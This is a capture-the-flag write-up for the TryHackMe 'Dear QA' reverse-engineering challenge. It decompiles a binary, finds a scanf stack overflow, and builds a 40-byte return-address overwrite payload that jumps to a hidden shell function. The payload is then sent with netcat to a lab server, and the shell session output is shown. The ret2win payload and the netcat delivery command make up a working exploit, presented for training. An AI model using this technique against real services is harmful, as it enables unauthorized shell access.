THM: Dear QA

This was Dear QA from THM, an Easy rated “reverse engineering and exploit development” challenge. I’m not very good at these so I struggled a bit but got it done.

Binary

We were given a binary to inspect: DearQA.DearQA

┌──(root💀kali)-[/opt/thm/dearqa]
└─# file DearQA.DearQA                                                                                                                                
DearQA.DearQA: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=8dae71dcf7b3fe612fe9f7a4d0fa068ff3fc93bd, not stripped

I disassembled the file in Ghidra and we have two notable functions, main and vuln.

Main (as per Ghidra):

undefined8 main(void)

{
  char local_28 [32];
  
  puts("Welcome dearQA");
  puts("I am sysadmin, i am new in developing");
  printf("What\'s your name: ");
  fflush(stdout);
  __isoc99_scanf(&DAT_00400851,local_28);
  printf("Hello: %s\n",local_28);
  return 0;
}

and Vuln:

void vuln(void)

{
  puts("Congratulations!");
  puts("You have entered in the secret function!");
  fflush(stdout);
  execve("/bin/bash",(char **)0x0,(char **)0x0);
  return;
}

Note that vuln is never called during the execution of main and hence the challenge is to gain execution of vuln, which we do by overflowing the buffer in scanf, here referred to as __isoc99_scanf which I gather is a compiler specific implementation of scanf.

The same type of thing is described here and here; note that the first example is for a 32-bit binary which is not the case for us.

We need the entry point for the vuln function which we can get from Ghidra:

00400686 55              PUSH       RBP

Or GDB:

└─# gdb DearQA.DearQA                                                                                                                                                           16 ⨯
GNU gdb (Debian 10.1-2) 10.1.90.20210103-git
Copyright (C) 2021 Free Software Foundation, Inc.                                                                                                                                    
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<https://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
    <http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from DearQA.DearQA...
(No debugging symbols found in DearQA.DearQA)
(gdb) break vuln
Breakpoint 1 at 0x40068a
(gdb) disass vuln
Dump of assembler code for function vuln:
   0x0000000000400686 <+0>:     push   %rbp

Or Binary Ninja, which I downloaded a trial version of.

Our address is 0x400686, or in Little Endian \x86\x06\x40 and we need to pad this to the right size: \x86\x06\x40\x00\x00\x00\x00\x00.

Next, we need to figure out how many dummy chars to insert before our address. I tried to figure this out for myself but I didn’t seem to be able to get it right, so in the end I let bash do it for me. We did know that it was at least 32 though, since that was the buffer size per Ghidra.

┌──(root💀kali)-[/opt/thm/dearqa]
└─#for i in {32..40}; do echo "i is $i" && python2 -c "print $i * 'A' + '\x86\x06\x40\x00\x00\x00\x00\x00'" | ./DearQA.DearQA; done
i is 32
Welcome dearQA
I am sysadmin, i am new in developing
Whats your name: Hello: AAAAAAAAAA�@
# etc
i is 40
Welcome dearQA
I am sysadmin, i am new in developing
Whats your name: Hello: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�@
Congratulations!
You have entered in the secret function!

Now we send our ‘exploit’ to the same binary running on a remote server and gain a shell. Piping the command to netcat results in a session that immediately dies so we need some fancy syntax like so:

┌──(root💀kali)-[/opt/thm/dearqa]
└─# cat <(python2 -c "print 40 * 'A' + '\x86\x06\x40\x00\x00\x00\x00\x00'") - | nc 10.10.90.142 5700                                                                             1 ⨯
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�^F@^@^@^@^@^@
Welcome dearQA
I am sysadmin, i am new in developing
Whats your name: Hello: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�@
Congratulations!
You have entered in the secret function!
bash: cannot set terminal process group (445): Inappropriate ioctl for device
bash: no job control in this shell
ctf@dearqa:/home/ctf$ id
id
uid=1000(ctf) gid=1000(ctf) groups=1000(ctf),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),115(bluetooth)
ctf@dearqa:/home/ctf$ ls -lash
ls -lash
total 40K
4.0K drwxr-xr-x 2 ctf  ctf  4.0K Jul 24  2021 .
4.0K drwxr-xr-x 3 root root 4.0K Jul 24  2021 ..
4.0K -rw------- 1 ctf  ctf   619 Jul 24  2021 .bash_history
4.0K -rw-r--r-- 1 ctf  ctf   220 Jul 24  2021 .bash_logout
4.0K -rw-r--r-- 1 ctf  ctf  3.5K Jul 24  2021 .bashrc
4.0K -rw-r--r-- 1 ctf  ctf   675 Jul 24  2021 .profile
8.0K -r-xr-xr-x 1 ctf  ctf  7.6K Jul 24  2021 DearQA
4.0K -rwx------ 1 root root  413 Jul 24  2021 dearqa.c
4.0K -r--r--r-- 1 ctf  ctf    22 Jul 24  2021 flag.txt
ctf@dearqa:/home/ctf$ cat flag.txt
# do it yourself